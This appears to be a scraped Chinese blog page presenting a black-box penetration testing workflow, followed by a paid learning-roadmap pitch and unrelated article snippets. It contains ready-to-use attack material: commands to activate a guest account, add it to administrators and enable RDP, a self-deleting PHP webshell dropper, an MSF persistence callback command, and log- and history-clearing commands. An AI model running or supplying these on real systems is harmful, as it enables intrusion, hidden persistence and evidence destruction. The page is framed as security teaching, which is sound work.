做网页游戏网站需要什么百度网盟推广网站

张小明 2025/12/25 12:09:20
做网页游戏网站需要什么,百度网盟推广网站,适合发朋友圈的营销广告,网站做seo的好处渗透测试就是利用我们所掌握的渗透知识#xff0c;对网站进行一步一步的渗透#xff0c;发现其中存在的漏洞和隐藏的风险#xff0c;然后撰写一篇测试报告#xff0c;提供给我们的客户。客户根据我们撰写的测试报告#xff0c;对网站进行漏洞修补#xff0c;以防止黑客的…渗透测试就是利用我们所掌握的渗透知识对网站进行一步一步的渗透发现其中存在的漏洞和隐藏的风险然后撰写一篇测试报告提供给我们的客户。客户根据我们撰写的测试报告对网站进行漏洞修补以防止黑客的入侵渗透测试的前提是我们得经过用户的授权才可以对网站进行渗透。如果我们没有经过客户的授权而对一个网站进行渗透测试的话这是违法的。去年的6.1日我国颁布了《网络安全法》对网络犯罪有了法律约束不懂的移步—— 网络安全法渗透测试分为白盒测试和黑盒测试白盒测试就是在知道目标网站源码和其他一些信息的情况下对其进行渗透有点类似于代码分析黑盒测试就是只告诉我们这个网站的url其他什么都不告诉然后让你去渗透模拟黑客对网站的渗透我们现在就模拟黑客对一个网站进行渗透测试这属于黑盒测试我们只知道该网站的URL其他什么的信息都不知道。接下来我就给大家分享下黑盒渗透测试的流程和思路当我们确定好了一个目标进行渗透之后第一步该做的是什么呢信息收集第一步做的就是信息收集正所谓知己知彼百战百胜我们根据网站URL可以查出一系列关于该网站的信息。通过URL我们可以查到该网站的IP、该网站操作系统、脚本语言、在该服务器上是否还有其他网站等等一些列的信息。漏洞探测当我们收集到了足够多的信息之后我们就要开始对网站进行漏洞探测了。探测网站是否存在一些常见的Web漏洞比如SQL注入XSS跨站脚本CSRF跨站请求伪造XXE漏洞SSRF服务端请求伪造漏洞文件包含漏洞文件上传漏洞文件解析漏洞远程代码执行漏洞CORS跨域资源共享漏洞越权访问漏洞目录浏览漏洞和任意文件读取/下载漏洞struts2漏洞JAVA反序列化漏洞这些是网站经常发现的一些漏洞还有一些网站漏洞这里我就不一一列举出来了。网站漏洞扫描工具也有很多比如AWVSAppScanOwasp-ZapNessus网站漏洞扫描工具我就列举这几种还有很多最常用的是这几个漏洞利用当我们探测到了该网站存在漏洞之后我们就要对该漏洞进行利用了。不同的漏洞有不同的利用工具很多时候通过一个漏洞我们很难拿到网站的webshell我们往往需要结合几个漏洞来拿webshell常用的漏洞利用工具如下SQL注入XSS跨站脚本抓包改包工具文件上传漏洞上传漏洞的话我们一般会上传一句话木马上去进而再获得webshell。但是获得了webshell后一般权限很低所以我们需要提权可以选择反弹一个MSF类型的shell提权Metasploit Framework(MSF) 、 Msfvenonm生成一个后门木马也可以反弹一个CobaltStrike类型的shellCobalt Strike 也可以MSF和CobaltStrike联动MSF和CobaltStrike联动 也可以使用其他提权Windows 、 Linux内网转发当我们获取到了网站的Webshell之后如果我们想获取该主机的有关信息我们可以将该主机的webshell换成MSF的shell。直接生成一个木马然后在菜刀中执行该木马我们就能接收到一个MSF类型的shell了。如果我们还想进一步的探测内网主机的信息的话我们就需要进行内网转发了。我们是不能直接和内网的主机通信的所以我们就需要借助获取到的webshell网站的服务器和内网主机进行通信。内网横向渗透当我们在获取了外网服务器的权限进入该系统后我们要想尽办法从该服务器上查找到我们想要的信息。对于windows主机我们应该多去翻翻目录或许能有很多意想不到的结果。很多人习惯把账号密码等容易忘的东西存放在备忘录中或者是桌面上。我们还可以查找数据库的连接文件查看数据库的连接账号密码等敏感信息。当我们获得了windows主机的账号密码或者是自己创建了新用户后我们为了不被网站管理员发现和不破坏服务器。我们尽量不要使用远程桌面。因为使用远程桌面动静比较大如果此时服务器管理员也在登录而你此时通过远程桌面登录的话会将管理员挤掉而你也将很快的被管理员踢掉。对于实在是要远程桌面登录的情况的话我们尽量不要新建一个用户进行登录。我们可以激活 guest 用户然后将其加入 administrators 组里面用 guest 用户身份登录。在RDP远程登录后我们可以查看其他用户桌面上和其他目录有哪些软件我们要找的目标有以下FTP相关的软件数据库相关的软件打开浏览器查看历史记录查看某些网站是否保存有用户密码。利用工具查看浏览器保存的密码从该主机上找到的账号密码我们可以做一个字典在对内网其他机器进行爆破的时候很有可能是同密码。net user guest /active:yes #激活guest用户 net localgroup administrators guest /add #将guest用户添加到 net user guest 密码 #更改guest用户密码 REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /t REG\_DWORD /d 00000000 /f #开启3389端口对于Linux主机我们可以查看开放的端口号开放的服务与其建立连接的内网主机。查看目录查找网站数据库连接密码。总之就是尽可能的多查找一些账号密码这对于内网的账号爆破非常有用。在搭建了隧道可以通内网后我们首先就需要对内网进行资产发现了。但是对于内网存活网段的判断是一个大问题。内网很有可能同时存在 10.0.0.0/8、172.16.0.0/16、192.168.0.0/24 网段。这就需要我们用扫描器对其进行探测了。通过代理进行内网扫描不建议使用nmap。如果是在本地主机通过代理扫描可以图形化界面的话可以使用 RouterScan 、御剑高速TCP全端口扫描器、IIS_Scanner。但是注意线程调低一点不然代理很容易崩了。如果使用命令行扫描器的话可以使用S扫描器。在扫描了内网资产和端口开放情况后对于445端口就可以打一波MS17_010。但是注意通过代理打445和之前的是不一样的。对于3389端口可以打一波CVE-2019-0708。对于1433/3306/6379等端口可以尝试爆破利用之前收集到的账号密码成功率更高哦。权限维持在拿到目标主机的权限后很有可能当时我们并不能获取到想要的东西需要进行长期的潜伏特别是在内网渗透中需要进行长期的信息收集。这时权限维持就很重要了。我们需要维持住获得的现有权限。Web后门1隐藏后门文件(将文件设置为隐藏)2不死马该脚本每5秒向服务器创建test.php并写入一句话免杀木马。结合attrib命令隐藏文件更好地建立后门。?php set_time_limit(0);//程序执行时间 ignore_user_abort(1);//关掉终端后脚本仍然运行 unlink(__FILE__);//文件完整名 while(1){ file_put_contents(test.php,?php $aarray($_REQUEST[x]3); $barray_keys($a)[0]; eval($b);?); sleep(5); } ?3404页面隐藏后门或者在其他自带文件中插入后门代码注以上几种后门方法均能被D盾等工具检测到Windows系统1建立隐藏用户在用户名后加 $2在开机启动目录下放置木马文件只要目标机器重启将回连我们的远控3MSF里的 persistence 模块执行命令可以使目标机器每隔一定时间自动回连远控。但是容易被发现#反弹时间间隔是5s 会自动连接192.168.27的4444端口缺点是容易被杀毒软件查杀 run persistence -X -i 5 -p 8888 -r 192.168.10.27 #然后它就在目标机新建了这个文件C:\\Windows\\TEMP\\CJzhFlNOWa.vbs 并把该服务加入了注册表中只要开机就会启动4在域环境下想办法获得 krbtgt 用户的哈希该用户的哈希可以进行票据传递攻击。而且一般该用户的密码不经常改变。5shift后门6远程桌面会话劫持Linux系统1SSH后门2crontab定时任务3SSH公钥4创建SUID0的用户痕迹清除当我们达到了目的之后有时候只是为了黑入网站挂黑页炫耀一下或者在网站留下一个后门作为肉鸡没事的时候上去溜达溜达亦或者挂入挖矿木马但是大家千万不要干这些事这些都是违法的我这里只是教大家在渗透进去之后如何清除我们留下的一部分痕迹并不能完全清除完全清除入侵痕迹是不可能的主要是增加管理员发现入侵者的时间成本和人力成本。只要管理员想查无论你怎么清除还是能查到的。最主要还是要以隐藏自身身份为主最好的手段是在渗透前挂上代理然后在渗透后痕迹清除。Windows系统1如果是windows系统可用MSF中的 clearev 命令清除痕迹2如果3389远程登录过需要清除mstsc痕迹3执行命令清除日志del %WINDR%\* .log /a/s/q/f4如果是web应用找到web日志文件删除Linux系统1如果是Linux系统在获取权限后执行以下命令不会记录输入过的命令export HISTFILE/dev/null export HISTSIZE02删除 /var/log 目录下的日志文件3如果是web应用找到web日志文件删除撰写渗透测试保告在完成了渗透测试之后我们就需要对这次渗透测试撰写渗透测试报告了。明确的写出哪里存在漏洞以及漏洞修补的方法。以便于网站管理员根据我们的渗透测试报告修补这些漏洞和风险防止被黑客攻击我们做的这一切的一切都是为了营造一个更安全更可信任的网络环境大家切记不要利用本篇文章进行违法犯罪行为网络安全学习路线学习资源网络安全的知识多而杂怎么科学合理安排下面给大家总结了一套适用于网安零基础的学习路线应届生和转行人员都适用学完保底6k就算你底子差如果能趁着网安良好的发展势头不断学习日后跳槽大厂、拿到百万年薪也不是不可能初级网工1、网络安全理论知识2天①了解行业相关背景前景确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。非常重要2、渗透测试基础一周①渗透测试的流程、分类、标准②信息收集技术主动/被动信息搜集、Nmap工具、Google Hacking③漏洞扫描、漏洞利用、原理利用方法、工具MSF、绕过IDS和反病毒侦察④主机攻防演练MS17-010、MS08-067、MS10-046、MS12-20等3、操作系统基础一周①Windows系统常见功能和命令②Kali Linux系统常见功能和命令③操作系统安全系统入侵排查/系统加固基础4、计算机网络基础一周①计算机网络基础、协议和架构②网络通信原理、OSI模型、数据转发流程③常见协议解析HTTP、TCP/IP、ARP等④网络攻击技术与网络安全防御技术⑤Web漏洞原理与防御主动/被动攻击、DDOS攻击、CVE漏洞复现5、数据库基础操作2天①数据库基础②SQL语言基础③数据库安全加固6、Web渗透1周①HTML、CSS和JavaScript简介②OWASP Top10③Web漏洞扫描工具④Web渗透工具Nmap、BurpSuite、SQLMap、其他菜刀、漏扫等恭喜你如果学到这里你基本可以从事一份网络安全相关的工作比如渗透测试、Web 渗透、安全服务、安全分析等岗位如果等保模块学的好还可以从事等保工程师。薪资区间6k-15k到此为止大概1个月的时间。你已经成为了一名“脚本小子”。那么你还想往下探索吗【“脚本小子”成长进阶资源领取】7、脚本编程初级/中级/高级在网络安全领域。是否具备编程能力是“脚本小子”和真正黑客的本质区别。在实际的渗透测试过程中面对复杂多变的网络环境当常用工具不能满足实际需求的时候往往需要对现有工具进行扩展或者编写符合我们要求的工具、自动化脚本这个时候就需要具备一定的编程能力。在分秒必争的CTF竞赛中想要高效地使用自制的脚本工具来实现各种目的更是需要拥有编程能力.零基础入门建议选择脚本语言Python/PHP/Go/Java中的一种对常用库进行编程学习 搭建开发环境和选择IDE,PHP环境推荐Wamp和XAMPP IDE强烈推荐Sublime ·Python编程学习学习内容包含语法、正则、文件、 网络、多线程等常用库推荐《Python核心编程》不要看完 ·用Python编写漏洞的exp,然后写一个简单的网络爬虫 ·PHP基本语法学习并书写一个简单的博客系统 熟悉MVC架构并试着学习一个PHP框架或者Python框架 (可选) ·了解Bootstrap的布局或者CSS。8、超级网工这部分内容对零基础的同学来说还比较遥远就不展开细说了贴一个大概的路线。感兴趣的童鞋可以研究一下不懂得地方可以【点这里】加我耗油跟我学习交流一下。网络安全工程师企业级学习路线如图片过大被平台压缩导致看不清的话可以【点这里】加我耗油发给你大家也可以一起学习交流一下。一些我自己买的、其他平台白嫖不到的视频教程需要的话可以扫描下方卡片加我耗油发给你都是无偿分享的大家也可以一起学习交流一下。网络安全学习路线学习资源结语网络安全产业就像一个江湖各色人等聚集。相对于欧美国家基础扎实懂加密、会防护、能挖洞、擅工程的众多名门正派我国的人才更多的属于旁门左道很多白帽子可能会不服气因此在未来的人才培养和建设上需要调整结构鼓励更多的人去做“正向”的、结合“业务”与“数据”、“自动化”的“体系、建设”才能解人才之渴真正的为社会全面互联网化提供安全保障。特别声明此教程为纯技术分享本书的目的决不是为那些怀有不良动机的人提供及技术支持也不承担因为技术被滥用所产生的连带责任本书的目的在于最大限度地唤醒大家对网络安全的重视并采取相应的安全措施从而减少由网络安全而带来的经济损失
版权声明:本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!

做一万个网站第二季企业网站开发php中文网

多尺度结构相似性指标MS-SSIM:图像恢复领域的感知评估利器 【免费下载链接】deep-image-prior Image restoration with neural networks but without learning. 项目地址: https://gitcode.com/gh_mirrors/de/deep-image-prior 在图像恢复技术快速发展的今天…

张小明 2025/12/22 10:54:29 网站建设

如何用oss做视频网站网站重要组成部分

欢迎来到小灰灰的博客空间!Weclome you! 博客主页:IT小灰灰 爱发电:小灰灰的爱发电 热爱领域:前端(HTML)、后端(PHP)、人工智能、云服务 免责声明:本文仅供学…

张小明 2025/12/22 5:44:07 网站建设

太原云起时网站建设wordpress作者关注功能怎么实现

draft-js自定义工具栏终极指南:从基础到高级的完整实现 【免费下载链接】draft-js A React framework for building text editors. 项目地址: https://gitcode.com/gh_mirrors/dra/draft-js 你是否在使用draft-js构建富文本编辑器时,发现默认的工…

张小明 2025/12/22 5:36:20 网站建设

想查客户信息做网站wordpress如何导入xml

如果本文能和大家一起回答三个问题,将是极好的: AI Agent智能体是什么?和LLM关系是什么? 推理能力是什么?如何拥有推理能力? AI Agent如何实现在传统自动化确定的workflow流程中加入不确定的思维推理&…

张小明 2025/12/22 8:12:50 网站建设

可以直接进入网站的正能量连接保山市城乡建设局网站

DeepSeek-V2.5:融合对话与编程能力的新一代AI开发助手 【免费下载链接】DeepSeek-V2.5 DeepSeek-V2.5是DeepSeek-AI推出的升级版语言模型,融合了DeepSeek-V2-Chat与DeepSeek-Coder-V2-Instruct的优势,具备强大的通用编程能力。优化后更贴近人…

张小明 2025/12/23 13:24:54 网站建设

辽宁大学网站怎么做网页平面设计培训班

活动目录域服务备份与恢复全攻略 在管理活动目录域服务时,备份和恢复操作至关重要。无论是应对突发情况,还是进行常规的数据保护,掌握正确的备份和恢复方法都能确保系统的稳定性和数据的安全性。下面将详细介绍各种备份和恢复的操作方法。 1. 命令行执行域控制器关键卷的非…

张小明 2025/12/22 5:39:32 网站建设